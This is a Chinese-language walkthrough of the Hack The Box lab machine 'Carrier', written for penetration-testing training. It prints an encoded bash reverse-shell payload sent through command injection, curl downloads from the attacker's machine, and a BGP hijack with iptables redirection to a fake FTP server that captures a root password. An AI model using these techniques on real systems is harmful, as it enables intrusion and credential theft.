【HTB靶场系列】靶机Carrier的渗透测试
出品|MS08067实验室(www.ms08067.com)
本文作者:大方子(Ms08067实验室核心成员)
Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台。它能帮助你提升渗透测试技能和黑盒测试技能,它包含了一些不断更新的挑战,其中有模拟真实世界场景,也有倾向于CTF风格的挑战。
https://www.hackthebox.eu/

平台上有很多靶机,从易到难,黑客每入侵一台机器都会获得相应积分,通过积分排名设有名人堂。今天要实验的是靶机Carrier。

目标靶机IP:10.10.10.105
本机IP:10.10.13.133
首先利用Nmap对目标靶机进行信息收集
nmap -sC -F -sV 10.10.10.105
-sC:通过默认脚本进行扫描
-sV:扫描目标主机端口上运行软件的版本
-F:扫描100个最有可能开放的端口

显示靶机开放了21,22,80,3306端口,但是21,3306端口被过滤了。22端口是SSH需要登陆,我们先从80端口开始看看能不能得到有用的信息
先打开网页,是一个登陆页面,有2个Error提示45007,45009,去Google查询类似的关键词发现没有什么可用信息,应该是自定义的WEB框架,

我们用gobuster来进行目录爆破
gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q

先看下tools
/tools:

点进去显示“许可过期,正在退出”
看下doc
/doc:



一个网络架构图还有一个是错误代码描述的PDF,根据刚刚网页提示的错误代码我们查下对应的解释
Error 4005:守护进程没有响应
Error 4009:配置中没有设置默认的用户名和密码(查看机箱序列号)
看下/debug

没有什么特别有用的信息
根据那种图可能还有别的设备,这样我想起了snmp服务
所以我们扫下靶机UDP的端口看看有没有什么有用的信息
nmap -sU 10.10.10.105

果然目标机器是有开启snmp,那么我们用snmpwalk来进行弱口令利用
snmpwalk -v 1 -c public 10.10.10.105

这个NET_45JDX23可能就是所谓的序列号
我们回到登陆进行登陆。
Username:尝试常见的默认用户名:admin, root
Password: NET_45JDX23

页面显示我们的凭证是无效的

我们进入Tickets

通过这条信息 我们知道了3个网段(大概就是刚刚那个网络架构图),还有一个FTP:10.120.15.0/24
然后我们在点Diagnosticd,提示我们凭证无效,但是可以使用检查功能
点下Verify status

这个部分很像是远程命令执行。
我们用BURP抓包看下信息

Check用base64转换下

很明显这个quagga就是上面输出信息的一部分,查找相关资料,发现这是一款路由器软件

那么我们设置对check这个参数进行攻击,我们把root的base64编码写进去


返回信息如下

那么我们在试着输入 root;echo hello


如图发现我们是可以用;进行多语句的执行,那么我们用bash反弹一个shell
现在用kali监听下9001

然后转换下编码

这里输出cm9vdDtiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEzLjEzMy85MDAxIDA+JjE=
需要注意的是需要把里面的+和=进入URL编码转换才行要不然会出错

这样我们就得到一个shell了

这样我们就可以得到user的flag了

接下来就是获得根ROOT的权限
从之前的信息我们了解到有一台FTP服务器:10.120.15.0/24
我们试着ping 10.120.15.1看看能不能ping通

我们需要在靶机上进行扫描,当然你可以用msf添加路由的方式扫描,这里我用另一个种方法把nmap的二进制静态执行文件上传到靶机进行扫描
Github:https://github.com/andrew-d/static-binaries

然后我们用python的SimpleHTTPServer模块建立服务然后靶机去下载这个文件

然后再靶机分别输入如下命令
curl http://10.10.13.133:8000/nmap -o nmap
chmod +x nmap

然后我们执行
./nmap -p 21 10.120.15.0/24

发现没有探测到,可能是目标禁止ICMP数据包
那么我们加个-Pn参数,同时把结果导出
./nmap -Pn -vvv -p 21 10.120.15.0/24 --open
-Pn:不进行ping直接扫描
-vvv:显示详细过程
--open:只显示端口open状态信息

我们发现 10.120.15.10是开放21端口的
然后我们尝试下FTP匿名登陆,登陆的时候可能不会有回显,需要自己打

无法执行,之前那个ticks也说这个FTP出现了问题。
我们需要通过劫持BGP欺骗AS200将数据传输给我们的靶机,然后开启假的FTP服务,之前的信息有显示到有人会定期访问这个FTP,这样我们就可以窃取到凭证


现在的情况大概就是图上这个样子
我们在终端分别输入
vtysh (quagga的命令)
configure terminal(进入配置模式)
do show run (显示配置信息)

我们需要增加一个network就是把刚刚FTP的那个网段加进来
这里我直接编辑/etc/ quagga下的bgpd.conf文件内容也就上面显示的内容

我们在自己的kali上编辑下内容在里面加一条10.120.15.0/25

然后用python的SimpleHTTPServer服务上传到靶机里面去跟nmap一样
把之前的文件重命名,然后把我们的文件下载下来
curl http://10.10.13.133:8000/bgpd.conf -o bgpd.con

然后在iptales上添加记录并重启quagga服务
iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.65:21
iptables -t nat -A POSTROUTING -j MASQUERADE
service quagga restart
然后我们在下载一个假的ftp监听21端口来得到凭证
Github:https://github.com/b1ngda0/FtpServicePython/

不久后就能得到账号密码
root:BGPtelc0rout1ng
然后ssh登陆并得到root flag


转载请联系作者并注明出处!
Ms08067安全实验室专注于网络安全知识的普及和培训。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,《Python安全攻防:渗透测试实战指南》,《Java代码安全审计(入门篇)》等书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:https://www.ms08067.com/
扫描下方二维码加入实验室VIP社区
加入后邀请加入内部VIP群,内部微信群永久有效!


【HTB靶场系列】靶机Carrier的渗透测试的更多相关文章
- 【HTB系列】靶机Access的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...
- 【HTB系列】靶机Chaos的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...
- 【HTB系列】靶机Querier的渗透测试
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 总结与反思: 1.收集信息要全面 2.用snmp-check检查snmp目标是否开启服务 ...
- 【HTB系列】靶机Netmon的渗透测试
出品|MS08067实验室(www.ms08067.com) 本文作者:是大方子(Ms08067实验室核心成员) 总结和反思: win中执行powershell的远程代码下载执行注意双引号转义 对po ...
- 【HTB系列】靶机Bitlab的渗透测试
出品|MS08067实验室(www.ms08067.com) 本文作者:是大方子(Ms08067实验室核心成员) 0x00 本文目录 反思与总结 基本信息 渗透测试过程 补充 0x01 反思与总结 c ...
- 【HTB系列】靶机Frolic的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...
- 【HTB系列】靶机Vault的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Kali: 10.10.14.213 靶机地址:10.10.10.109 先用nmap探 ...
- 【HTB系列】靶机Teacher的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对 ...
- 【HTB系列】 靶机Swagshop的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:是大方子(Ms08067实验室核心成员) 总结与反思 使用vi提权 magento漏洞的利用 magescan 工具的使用 靶机 ...
随机推荐
- Tomcat优化,JNDI,连接池,数据源
什么是JNDI? JNDI的简单应用 什么是连接池技术? 连接池 性能 连接池技术与传统数据库连接的比较 连接池技术工作原理 为什么使用连接池? 传统数据库连接方式的不足 企业级开发需要稳健和高效的数 ...
- rand()函数 不同区间 整数和浮点数
C++中rand()范围[0,RAND_MAX] 1.生成整数随机数,a b均为整数,且 [a,b)---rand()%(b-a)+a [a,b] ---rand()%(b-a+1)+a (a ...
- 真正云原生的智能运维体系,阿里云发布ECS自动化运维套件
云计算的发展,推动了自动化运维.DevOps.AIOps 等趋势的兴起,在业务快速变化的今天,企业希望通过一套自动化运维的专家系统提高运维效率,为业务提供支撑. 传统的方式下,打造一套成熟的 DevO ...
- springboot源码解析-管中窥豹系列之web服务器(七)
一.前言 Springboot源码解析是一件大工程,逐行逐句的去研究代码,会很枯燥,也不容易坚持下去. 我们不追求大而全,而是试着每次去研究一个小知识点,最终聚沙成塔,这就是我们的springboot ...
- 从微信小程序到鸿蒙js开发【05】——tabs组件&每日新闻
目录: 1.tabs, tab-bar, tab-content 2.tabs的事件处理 3.tabs实现的每日新闻 1.tabs, tab-bar, tab-content 上章说到,鸿蒙的list ...
- 一文弄懂-《Scalable IO In Java》
目录 一. <Scalable IO In Java> 是什么? 二. IO架构的演变历程 1. Classic Service Designs 经典服务模型 2. Event-drive ...
- manacher算法——回文串计算的高效算法
manacher算法的由来不再赘述,自行百度QWQ... 进入正题,manacher算法是一个高效的计算回文串的算法,回文串如果不知道可以给出一个例子:" noon ",这样应该就 ...
- poj2443Set Operation (bitset)
Description You are given N sets, the i-th set (represent by S(i)) have C(i) element (Here "set ...
- hdu5407CRB and Candies (逆元+数学公式)
Problem Description CRB has N different candies. He is going to eat K candies. He wonders how many c ...
- 哈尔滨理工大学软件与微电子学院程序设计竞赛(同步赛) C.Coronavirus (BFS)
题意:有一个图,要求从\(S\)走到\(E\),\(.\)表示可以走的路径,\(*\)周围的八个方向均不能走,要求判断是否能走到\(E\),若能,输出最小路径长度,否则输出\(Impossible\) ...